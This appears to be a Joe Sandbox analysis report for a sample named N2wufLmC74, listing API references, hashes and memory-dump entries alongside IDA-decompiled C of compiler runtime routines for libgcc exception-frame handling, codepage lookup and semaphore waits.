0x013f063f
0x013f0644
0x00000000
0x00000000
0x00000000
0x00000000
0x013f0644
0x00000000
0x013f063d
0x013f0678
0x013f0681
0x013f0686
0x013f068b
0x013f068e
0x013f0690
0x013f0693
0x013f0698
0x013f069d
0x013f06a1
0x013f06a6
0x013f06a8
0x013f06ab
0x013f06ae
0x013f06b4
0x013f06d0
0x013f06d0
0x013f06d5
0x013f06da
0x013f06b6
0x013f06b6
0x013f06be
0x013f0845
0x013f06c4
0x013f06c9
0x013f06c9
0x013f06ce
0x00000000
0x00000000
0x013f06ce
0x013f06e2
0x013f06e6
0x013f06e8
0x013f06eb
0x013f06f2
0x013f06ff
0x013f0704
0x013f0709
0x013f070e
0x013f0712
0x013f0717
0x013f071a
0x013f071f
0x013f071f
0x013f0721
0x013f0724
0x013f072a
0x013f0741
0x013f0741
0x013f0746
0x013f074b
0x013f074d
0x013f0750
0x013f072c
0x013f072c
0x013f0734
0x013f082d
0x00000000
0x013f0833
0x013f0833
0x013f0835
0x00000000
0x013f0835
0x00000000
0x013f073a
0x013f073f
0x00000000
0x00000000
0x013f073f
0x013f0734
0x013f0753
0x013f0753
0x013f0757
0x013f0759
0x013f075c
0x013f0763
0x013f0767
0x013f076c
0x013f0772
0x013f0777
0x013f077c
0x013f0780
0x013f0785
0x013f0787
0x013f078a
0x013f078d
0x013f0790
0x013f0796
0x013f07ae
0x013f07ae
0x013f07b3
0x013f07b8
0x013f0798
0x013f0798
0x013f07a0
0x013f081d
0x013f07a2
0x013f07a7
0x013f07a7
0x013f07ac
0x00000000
0x00000000
0x013f07ac
0x013f07c3
0x013f07c7
0x013f07c9
0x013f07cc
0x013f07d3
0x013f07e0
0x013f07e6
0x013f07eb
0x013f07f0
0x013f07f4
0x013f07f9
0x013f07fc
0x013f07ff
0x013f0811
0x013f0811
0x013f060f
0x00000000

APIs

Part of subcall function 01438880: memset.MSVCRT ref: 014388C5

strcmp.MSVCRT ref: 013F0631
strlen.MSVCRT ref: 013F064C
strlen.MSVCRT ref: 013F0693
strlen.MSVCRT ref: 013F0704
strlen.MSVCRT ref: 013F0772

Strings

*, xrefs: 013F0850

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: strlen$memsetstrcmp
String ID: *
API String ID: 3639840916-163128923
Opcode ID: b5de438772b7498a8740e9e09e121b4dc308b76a82e4ccf9f9a2a6c6bab18462
Instruction ID: 86cda08c2a278263155419162416592f9652962e63579f41ae4f7f6605fa0f7e
Opcode Fuzzy Hash: b5de438772b7498a8740e9e09e121b4dc308b76a82e4ccf9f9a2a6c6bab18462
Instruction Fuzzy Hash: DF814875A056018FDB04EF2DC488659FBF6FF98314F0185ADE9449B365D731A805CB82

Uniqueness

Uniqueness Score: -1.00%

Function 013D9890 Relevance: 10.7, APIs: 7, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E013D9890(signed int __eax, CHAR* __ecx, char* __edx) {
				void* _v16;
				signed int _v32;
				signed int _v45;
				char* _v52;
				signed int _v56;
				unsigned short _v60;
				signed int _v64;
				char* _v132;
				unsigned short _t64;
				char _t65;
				signed int _t71;
				signed int _t72;
				struct HINSTANCE__* _t74;
				_Unknown_base(*)()* _t75;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				signed int _t82;
				signed int _t85;
				CHAR* _t98;
				struct HINSTANCE__* _t99;
				signed int _t101;
				unsigned short _t116;
				char _t119;
				_Unknown_base(*)()* _t120;
				signed int _t121;
				void* _t123;
				intOrPtr* _t124;
				char** _t126;
				char** _t127;
				struct HINSTANCE__** _t129;
				struct HINSTANCE__** _t130;

				_t98 = __ecx;
				_t124 = _t123 - 0x4c;
				_v64 = __eax;
				_t64 =  *(__eax + 0x10) & 0x0000ffff;
				_v52 = __edx;
				_v60 = _t64;
				_t65 = _t64 >> 3;
				if(_t65 == 0xff) {
					_v56 = 0;
					_t121 = 0xff;
					goto L11;
				} else {
					__eax = __eax & 0x00000070;
					__eflags = __al - 0x20;
					if(__eflags == 0) {
						__eax = _v64;
						__eax =  *(_v64 + 4);
						_v56 = __eax;
						goto L11;
					} else {
						if(__eflags <= 0) {
							L42:
							_v56 = 0;
							goto L11;
						} else {
							__eflags = __al - 0x30;
							if(__al != 0x30) {
								__eflags = __al - 0x50;
								if(__al != 0x50) {
									goto L51;
								} else {
									goto L42;
								}
							} else {
								__eax = _v64;
								__eax =  *((intOrPtr*)(_v64 + 8));
								_v56 = __eax;
								L11:
								_t119 =  *_t98;
								_v60 = 0;
								__eflags = _t119;
								if(_t119 == 0) {
									L26:
									return _t65;
								} else {
									do {
										_t65 = _t98[4];
										__eflags = _t65;
										if(_t65 == 0) {
											goto L25;
										} else {
											_t101 = _v64;
											__eflags =  *(_t101 + 0x10) & 0x00000004;
											if(( *(_t101 + 0x10) & 0x00000004) == 0) {
												L27:
												__eflags = _t121;
												if(_t121 == 0) {
													goto L22;
												} else {
													 *_t124 =  &_v32;
													E013D9050(_t121 & 0x000000ff,  &(_t98[8]), _v56);
													_t65 = _t121;
													_v45 = _t65;
													__eflags = _t65 - 0xff;
													if(_t65 == 0xff) {
														goto L25;
													} else {
														goto L29;
													}
												}
											} else {
												_t116 =  &(_t98[4]) - _t65;
												__eflags = _t116 - _v60;
												if(_t116 == _v60) {
													goto L27;
												} else {
													_t82 = E013D91E0(_t116);
													_v45 = _t82;
													_t121 = _t82;
													__eflags = _t82 - 0xff;
													if(_t82 == 0xff) {
														 *_t124 =  &_v32;
														_t65 = E013D9050(0xff,  &(_t98[8]), 0);
														_v60 = _t116;
														_v56 = 0;
														goto L25;
													} else {
														_t85 = _t82 & 0x00000070;
														__eflags = _t85 - 0x20;
														if(__eflags == 0) {
															_v60 = _t116;
															_v56 =  *(_v64 + 4);
															__eflags = _t121;
															if(_t121 == 0) {
																goto L22;
															} else {
																goto L44;
															}
														} else {
															if(__eflags <= 0) {
																L36:
																_v60 = _t116;
																_v56 = 0;
																__eflags = _t121;
																if(_t121 == 0) {
																	goto L22;
																} else {
																	 *_t124 =  &_v32;
																	E013D9050(_t121 & 0x000000ff,  &(_t98[8]), 0);
																	_v45 = _t121;
																	_t71 = _v45 & 7;
																	__eflags = _t71 - 2;
																	if(__eflags != 0) {
																		goto L30;
																	} else {
																		goto L38;
																	}
																}
															} else {
																__eflags = _t85 - 0x30;
																if(_t85 != 0x30) {
																	__eflags = _t85 - 0x50;
																	if(_t85 != 0x50) {
																		goto L51;
																	} else {
																		goto L36;
																	}
																} else {
																	_v60 = _t116;
																	_v56 =  *(_v64 + 8);
																	__eflags = _t121;
																	if(_t121 != 0) {
																		L44:
																		 *_t124 =  &_v32;
																		E013D9050(_t121 & 0x000000ff,  &(_t98[8]), _v56);
																		L29:
																		_t71 = _v45 & 7;
																		__eflags = _t71 - 2;
																		if(__eflags == 0) {
																			L38:
																			_t72 = 0xffff;
																			goto L33;
																		} else {
																			L30:
																			if(__eflags > 0) {
																				__eflags = _t71 - 3 - 1;
																				if(_t71 - 3 <= 1) {
																					goto L32;
																				} else {
																					goto L51;
																				}
																			} else {
																				__eflags = _t71;
																				if(_t71 != 0) {
																					L51:
																					abort();
																					abort();
																					abort();
																					abort();
																					abort();
																					abort();
																					abort();
																					_push(_t121);
																					_push(_t116);
																					_push(_t119);
																					_t126 = _t124 - 0x1c;
																					 *_t126 = "libgcc_s_dw2-1.dll";
																					_t74 = GetModuleHandleA(_t98);
																					_t127 = _t126 - 4;
																					if(_t74 == 0) {
																						_t75 = 0x13dae40;
																						_t120 = E013DA660;
																					} else {
																						_t99 = _t74;
																						 *_t127 = "libgcc_s_dw2-1.dll";
																						_t78 = LoadLibraryA(??);
																						_t129 = _t127 - 4;
																						 *0x14f2020 = _t78;
																						_v132 = "__register_frame_info";
																						 *_t129 = _t99;
																						_t79 = GetProcAddress(??, ??);
																						_t130 = _t129 - 8;
																						_t120 = _t79;
																						_v132 = "__deregister_frame_info";
																						 *_t130 = _t99;
																						_t75 = GetProcAddress(??, ??);
																						_t127 = _t130 - 8;
																					}
																					 *0x1481004 = _t75;
																					if(_t120 != 0) {
																						_v132 = 0x14f2024;
																						 *_t127 = 0x14b3104;
																						 *_t120();
																					}
																					 *_t127 = E013C1560;
																					return E013C14A0();
																				} else {
																					L32:
																					_t72 = 0xffffffff;
																					L33:
																					_t65 = _t72 & _v32;
																					__eflags = _t65;
																					if(_t65 != 0) {
																						goto L23;
																					} else {
																					}
																					goto L25;
																				}
																			}
																		}
																	} else {
																		L22:
																		_t65 = _t98[8];
																		_t121 = 0;
																		__eflags = _t65;
																		if(_t65 != 0) {
																			L23:
																			_t65 =  *_v52;
																			__eflags = _t65;
																			if(_t65 != 0) {
																				_t28 =  *(_t65 + 4) + 1; // 0x1
																				 *(_t65 + 4) = _t28;
																				 *(_t65 + 8 +  *(_t65 + 4) * 4) = _t98;
																			}
																		}
																		goto L25;
																	}
																}
															}
														}
													}
												}
											}
										}
										goto L58;
										L25:
										_t98 =  &(_t98[_t119 + 4]);
										_t119 =  *_t98;
										__eflags = _t119;
									} while (_t119 != 0);
									goto L26;
								}
							}
						}
					}
				}
				L58:
			}

0x013d9894
0x013d9896
0x013d9899
0x013d989d
0x013d98a1
0x013d98a5
0x013d98aa
0x013d98b0
0x013d9af0
0x013d9af8
0x00000000
0x013d98b6
0x013d98b9
0x013d98bc
0x013d98be
0x013d9ae0
0x013d9ae4
0x013d9ae7
0x00000000
0x013d98c4
0x013d98c4
0x013d9a68
0x013d9a68
0x00000000
0x013d98ca
0x013d98ca
0x013d98cc
0x013d9a60
0x013d9a62
0x00000000
0x00000000
0x00000000
0x00000000
0x013d98d2
0x013d98d2
0x013d98d6
0x013d98d9
0x013d98e0
0x013d98e0
0x013d98e2
0x013d98ea
0x013d98ec
0x013d999e
0x013d99a5
0x013d98f8
0x013d98f8
0x013d98f8
0x013d98fb
0x013d98fd
0x00000000
0x013d9903
0x013d9903
0x013d9907
0x013d990b
0x013d99b0
0x013d99b0
0x013d99b2
0x00000000
0x013d99b4
0x013d99bd
0x013d99c7
0x013d99cc
0x013d99ce
0x013d99d2
0x013d99d4
0x00000000
0x00000000
0x00000000
0x00000000
0x013d99d4
0x013d9911
0x013d9914
0x013d991a
0x013d991c
0x00000000
0x013d9922
0x013d9924
0x013d9929
0x013d992d
0x013d992f
0x013d9931
0x013d9ab9
0x013d9ac1
0x013d9ac6
0x013d9aca
0x00000000
0x013d9937
0x013d9937
0x013d993a
0x013d993c
0x013d9a7c
0x013d9a83
0x013d9a87
0x013d9a89
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9942
0x013d9942
0x013d9a08
0x013d9a08
0x013d9a0c
0x013d9a14
0x013d9a16
0x00000000
0x013d9a1c
0x013d9a25
0x013d9a2d
0x013d9a34
0x013d9a3d
0x013d9a40
0x013d9a42
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9a42
0x013d9948
0x013d9948
0x013d994a
0x013d9a00
0x013d9a02
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9950
0x013d9954
0x013d995b
0x013d995f
0x013d9961
0x013d9a8f
0x013d9a98
0x013d9aa2
0x013d99d6
0x013d99db
0x013d99de
0x013d99e0
0x013d9a44
0x013d9a44
0x00000000
0x013d99e2
0x013d99e2
0x013d99e2
0x013d9a53
0x013d9a55
0x00000000
0x013d9a57
0x00000000
0x013d9a57
0x013d99e4
0x013d99e4
0x013d99e6
0x0147aa58
0x0147aa58
0x0147aa5d
0x0147aa62
0x0147aa67
0x0147aa6c
0x0147aa71
0x0147aa76
0x013c14c0
0x013c14c3
0x013c14c4
0x013c14c6
0x013c14c9
0x013c14d0
0x013c14d6
0x013c14db
0x013c1550
0x013c1555
0x013c14dd
0x013c14dd
0x013c14df
0x013c14e6
0x013c14f2
0x013c14f5
0x013c14fa
0x013c1502
0x013c1505
0x013c1507
0x013c150a
0x013c150c
0x013c1514
0x013c1517
0x013c1519
0x013c1519
0x013c151c
0x013c1523
0x013c1525
0x013c152d
0x013c1534
0x013c1534
0x013c1536
0x013c1549
0x013d99ec
0x013d99ec
0x013d99ec
0x013d99f1
0x013d99f1
0x013d99f1
0x013d99f5
0x00000000
0x00000000
0x013d99f7
0x00000000
0x013d99f5
0x013d99e6
0x013d99e2
0x013d9970
0x013d9970
0x013d9970
0x013d9973
0x013d9975
0x013d9977
0x013d9979
0x013d997d
0x013d997f
0x013d9981
0x013d9986
0x013d9989
0x013d998c
0x013d998c
0x013d9981
0x00000000
0x013d9977
0x013d9961
0x013d994a
0x013d9942
0x013d993c
0x013d9931
0x013d991c
0x013d990b
0x00000000
0x013d9990
0x013d9990
0x013d9994
0x013d9996
0x013d9996
0x00000000
0x013d98f8
0x013d98ec
0x013d98cc
0x013d98c4
0x013d98be
0x00000000

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6210d0f6563a9ccc81fecc003a03b0047365e4732b1f63a5259ba7528cc991fc
Instruction ID: 68c819cd6af00c05210344dad942cc3d4c113c12d24587e52feb8c034d60b71a
Opcode Fuzzy Hash: 6210d0f6563a9ccc81fecc003a03b0047365e4732b1f63a5259ba7528cc991fc
Instruction Fuzzy Hash: DC51B1725083068FDB20DF1DE08076AFBE4AF8820CF098A5EE8D99B255D734D946CB56

Uniqueness

Uniqueness Score: -1.00%

Function 013D92F0 Relevance: 10.6, APIs: 7, Instructions: 126synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 013D9437
WaitForSingleObject.KERNEL32 ref: 013D9478

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 9239bd45eb9d7b19bc4817a75ab938e543c79e3cb3dc192b3ab7c4233b615434
Instruction ID: b1c50fba4ac6456c526d1a63467eab043dc4233a19a1bea22ce9d1cfff7a102e
Opcode Fuzzy Hash: 9239bd45eb9d7b19bc4817a75ab938e543c79e3cb3dc192b3ab7c4233b615434
Instruction Fuzzy Hash: 9C5169B26053018FDB24DF29E484B2ABBF5BB4530CF45811CD9498B3A9EB70E454CB62

Uniqueness

Uniqueness Score: -1.00%

Function 013DB1A0 Relevance: 10.6, APIs: 7, Instructions: 61COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 013DB1B9
memcpy.MSVCRT ref: 013DB1DD
malloc.MSVCRT ref: 013DB1F7
memset.MSVCRT ref: 013DB225
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA6C
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA71
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA76

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort$malloc$memcpymemset
String ID:
API String ID: 334492700-0
Opcode ID: 95d0de088aa76ab016ac8e517ef2793c18bef32ad3fc14d143254aff5c706310
Instruction ID: 27871598aaba5b28d9769d6f1f24d8ad119d2812b41494bba9987eee804fd307
Opcode Fuzzy Hash: 95d0de088aa76ab016ac8e517ef2793c18bef32ad3fc14d143254aff5c706310
Instruction Fuzzy Hash: B81173B2A0430A9FD700BF6DD58495AFBE4EF89298F45857ED948C7740E730D9148B61

Uniqueness

Uniqueness Score: -1.00%

Function 013E3B40 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 013E3B4C
GetProcAddress.KERNEL32 ref: 013E3B6C
GetProcAddress.KERNEL32 ref: 013E3B9D

Strings

msvcrt.dll, xrefs: 013E3B45
___lc_codepage_func, xrefs: 013E3B5B
__lc_codepage, xrefs: 013E3B92

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: 868cbaef79e42068da0e6f26128fe5fac14a5627b9d0c8a6efc427b0a0827cf0
Instruction ID: 1f37513d2f99d482032c72af3ca58be8c272265be032dcf6f6937dc1f3332af2
Opcode Fuzzy Hash: 868cbaef79e42068da0e6f26128fe5fac14a5627b9d0c8a6efc427b0a0827cf0
Instruction Fuzzy Hash: BDF062B5C453228BDB107F3C594D146BFE4FB04224F46452EC886CB354E774C458CB92

Uniqueness

Uniqueness Score: -1.00%

Function 013D9A4C Relevance: 10.5, APIs: 7, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E013D9A4C(void* __eax, signed int _a28, signed int _a32, signed int _a36, signed int _a40, signed int _a47, signed int _a60) {
				void* _v16;
				char* _v40;
				signed int* __ebx;
				signed int __edi;
				signed int __esi;
				signed int __ebp;
				struct HINSTANCE__* _t51;
				_Unknown_base(*)()* _t52;
				struct HINSTANCE__* _t55;
				_Unknown_base(*)()* _t56;
				CHAR* _t57;
				struct HINSTANCE__* _t59;
				_Unknown_base(*)()* _t64;
				void* _t69;
				char** _t70;
				char** _t71;
				struct HINSTANCE__** _t73;
				struct HINSTANCE__** _t74;

				while(1) {
					L33:
					__eax = __eax - 3;
					__eflags = __al - 1;
					if(__al <= 1) {
						goto L26;
					} else {
						break;
					}
					do {
						L26:
						__eax = 0xffffffff;
						while(1) {
							__eax = __eax & _a60;
							__eflags = __eax;
							if(__eax != 0) {
								goto L17;
							}
							L28:
							while(1) {
								L19:
								__ebx = __ebx + __esi + 4;
								__esi =  *__ebx;
								__eflags = __esi;
								if(__esi == 0) {
									break;
								}
								__eax = __ebx[1];
								__eflags = __eax;
								if(__eax == 0) {
									continue;
								} else {
									__ecx = _a28;
									__eflags =  *(__ecx + 0x10) & 0x00000004;
									if(( *(__ecx + 0x10) & 0x00000004) == 0) {
										L21:
										__eflags = __ebp;
										if(__ebp == 0) {
											goto L16;
										} else {
											__edx =  &_a60;
											__eax = __ebp;
											__ecx =  &(__ebx[2]);
											 *__esp =  &_a60;
											__edx = _a36;
											__al & 0x000000ff = E013D9050(__al & 0x000000ff,  &(__ebx[2]), _a36);
											__eax = __ebp;
											_a47 = __al;
											__eflags = __al - 0xff;
											if(__al == 0xff) {
												continue;
											} else {
												goto L23;
											}
										}
									} else {
										__edi =  &(__ebx[1]);
										__edi =  &(__ebx[1]) - __eax;
										__eax = _a32;
										__eflags = __edi - _a32;
										if(__edi == _a32) {
											goto L21;
										} else {
											__eax = __edi;
											__eax = E013D91E0(__edi);
											_a47 = __al;
											__ebp = __eax;
											__eflags = __al - 0xff;
											if(__al == 0xff) {
												__eax =  &_a60;
												__ecx =  &(__ebx[2]);
												__edx = 0;
												 *__esp =  &_a60;
												__eax = 0xff;
												__eax = E013D9050(0xff,  &(__ebx[2]), 0);
												_a32 = __edi;
												_a36 = 0;
												continue;
											} else {
												__eax = __eax & 0x00000070;
												__eflags = __al - 0x20;
												if(__eflags == 0) {
													__eax = _a28;
													_a32 = __edi;
													__eax =  *(_a28 + 4);
													_a36 =  *(_a28 + 4);
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L16;
													} else {
														goto L36;
													}
												} else {
													if(__eflags <= 0) {
														L30:
														_a32 = __edi;
														_a36 = 0;
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L16;
														} else {
															__edx =  &_a60;
															__eax = __ebp;
															__ecx =  &(__ebx[2]);
															 *__esp =  &_a60;
															__eax = __al & 0x000000ff;
															__edx = 0;
															E013D9050(__al & 0x000000ff,  &(__ebx[2]), 0) = __ebp;
															_a47 = __al;
															__eax = _a47 & 0x000000ff;
															__eax = _a47 & 7;
															__eflags = __al - 2;
															if(__eflags != 0) {
																goto L24;
															} else {
																goto L32;
															}
														}
													} else {
														__eflags = __al - 0x30;
														if(__al != 0x30) {
															__eflags = __al - 0x50;
															if(__al != 0x50) {
																L40:
																abort();
																abort();
																abort();
																abort();
																abort();
																abort();
																abort();
																_t70 = _t69 - 0x1c;
																 *_t70 = "libgcc_s_dw2-1.dll";
																_t51 = GetModuleHandleA(_t57);
																_t71 = _t70 - 4;
																if(_t51 == 0) {
																	_t52 = 0x13dae40;
																	_t64 = E013DA660;
																} else {
																	_t59 = _t51;
																	 *_t71 = "libgcc_s_dw2-1.dll";
																	_t55 = LoadLibraryA(??);
																	_t73 = _t71 - 4;
																	 *0x14f2020 = _t55;
																	_v40 = "__register_frame_info";
																	 *_t73 = _t59;
																	_t56 = GetProcAddress(??, ??);
																	_t74 = _t73 - 8;
																	_t64 = _t56;
																	_v40 = "__deregister_frame_info";
																	 *_t74 = _t59;
																	_t52 = GetProcAddress(??, ??);
																	_t71 = _t74 - 8;
																}
																 *0x1481004 = _t52;
																if(_t64 != 0) {
																	_v40 = 0x14f2024;
																	 *_t71 = 0x14b3104;
																	 *_t64();
																}
																 *_t71 = E013C1560;
																return E013C14A0();
															} else {
																goto L30;
															}
														} else {
															__eax = _a28;
															_a32 = __edi;
															__eax =  *(_a28 + 8);
															_a36 =  *(_a28 + 8);
															__eflags = __ebp;
															if(__ebp != 0) {
																L36:
																__edx =  &_a60;
																__eax = __ebp;
																__ecx =  &(__ebx[2]);
																 *__esp =  &_a60;
																__edx = _a36;
																__al & 0x000000ff = E013D9050(__al & 0x000000ff,  &(__ebx[2]), _a36);
																L23:
																__eax = _a47 & 0x000000ff;
																__eax = _a47 & 7;
																__eflags = __al - 2;
																if(__eflags == 0) {
																	L32:
																	__eax = 0xffff;
																	__eax = __eax & _a60;
																	__eflags = __eax;
																	if(__eax != 0) {
																		goto L17;
																	}
																	continue;
																} else {
																	L24:
																	if(__eflags > 0) {
																		goto L33;
																	} else {
																		goto L25;
																	}
																}
															} else {
																L16:
																__eax = __ebx[2];
																__ebp = 0;
																__eflags = __eax;
																if(__eax != 0) {
																	goto L17;
																}
																continue;
															}
														}
													}
												}
											}
										}
									}
								}
								L47:
							}
							__esp = __esp + 0x4c;
							_pop(__ebx);
							_pop(__esi);
							_pop(__edi);
							_pop(__ebp);
							return __eax;
							goto L47;
							L17:
							__eax = _a40;
							__eax =  *_a40;
							__eflags = __eax;
							if(__eax != 0) {
								__edx =  *(__eax + 4);
								_t20 = __edx + 1; // 0x1
								__ecx = _t20;
								 *(__eax + 4) = _t20;
								 *(__eax + 8 +  *(__eax + 4) * 4) = __ebx;
							}
							goto L19;
						}
						L25:
						__eflags = __al;
					} while (__al == 0);
					goto L40;
				}
				goto L40;
			}

0x013d9a50
0x013d9a50
0x013d9a50
0x013d9a53
0x013d9a55
0x00000000
0x00000000
0x00000000
0x00000000
0x013d99ec
0x013d99ec
0x013d99ec
0x013d99f1
0x013d99f1
0x013d99f1
0x013d99f5
0x00000000
0x00000000
0x013d99f7
0x013d9990
0x013d9990
0x013d9990
0x013d9994
0x013d9996
0x013d9998
0x00000000
0x00000000
0x013d98f8
0x013d98fb
0x013d98fd
0x00000000
0x013d9903
0x013d9903
0x013d9907
0x013d990b
0x013d99b0
0x013d99b0
0x013d99b2
0x00000000
0x013d99b4
0x013d99b4
0x013d99b8
0x013d99ba
0x013d99bd
0x013d99c0
0x013d99c7
0x013d99cc
0x013d99ce
0x013d99d2
0x013d99d4
0x00000000
0x00000000
0x00000000
0x00000000
0x013d99d4
0x013d9911
0x013d9911
0x013d9914
0x013d9916
0x013d991a
0x013d991c
0x00000000
0x013d9922
0x013d9922
0x013d9924
0x013d9929
0x013d992d
0x013d992f
0x013d9931
0x013d9ab0
0x013d9ab4
0x013d9ab7
0x013d9ab9
0x013d9abc
0x013d9ac1
0x013d9ac6
0x013d9aca
0x00000000
0x013d9937
0x013d9937
0x013d993a
0x013d993c
0x013d9a78
0x013d9a7c
0x013d9a80
0x013d9a83
0x013d9a87
0x013d9a89
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9942
0x013d9942
0x013d9a08
0x013d9a08
0x013d9a0c
0x013d9a14
0x013d9a16
0x00000000
0x013d9a1c
0x013d9a1c
0x013d9a20
0x013d9a22
0x013d9a25
0x013d9a28
0x013d9a2b
0x013d9a32
0x013d9a34
0x013d9a38
0x013d9a3d
0x013d9a40
0x013d9a42
0x00000000
0x00000000
0x00000000
0x00000000
0x013d9a42
0x013d9948
0x013d9948
0x013d994a
0x013d9a00
0x013d9a02
0x0147aa58
0x0147aa58
0x0147aa5d
0x0147aa62
0x0147aa67
0x0147aa6c
0x0147aa71
0x0147aa76
0x013c14c6
0x013c14c9
0x013c14d0
0x013c14d6
0x013c14db
0x013c1550
0x013c1555
0x013c14dd
0x013c14dd
0x013c14df
0x013c14e6
0x013c14f2
0x013c14f5
0x013c14fa
0x013c1502
0x013c1505
0x013c1507
0x013c150a
0x013c150c
0x013c1514
0x013c1517
0x013c1519
0x013c1519
0x013c151c
0x013c1523
0x013c1525
0x013c152d
0x013c1534
0x013c1534
0x013c1536
0x013c1549
0x00000000
0x00000000
0x00000000
0x013d9950
0x013d9950
0x013d9954
0x013d9958
0x013d995b
0x013d995f
0x013d9961
0x013d9a8f
0x013d9a8f
0x013d9a93
0x013d9a95
0x013d9a98
0x013d9a9b
0x013d9aa2
0x013d99d6
0x013d99d6
0x013d99db
0x013d99de
0x013d99e0
0x013d9a44
0x013d9a44
0x013d99f1
0x013d99f1
0x013d99f5
0x00000000
0x00000000
0x00000000
0x013d99e2
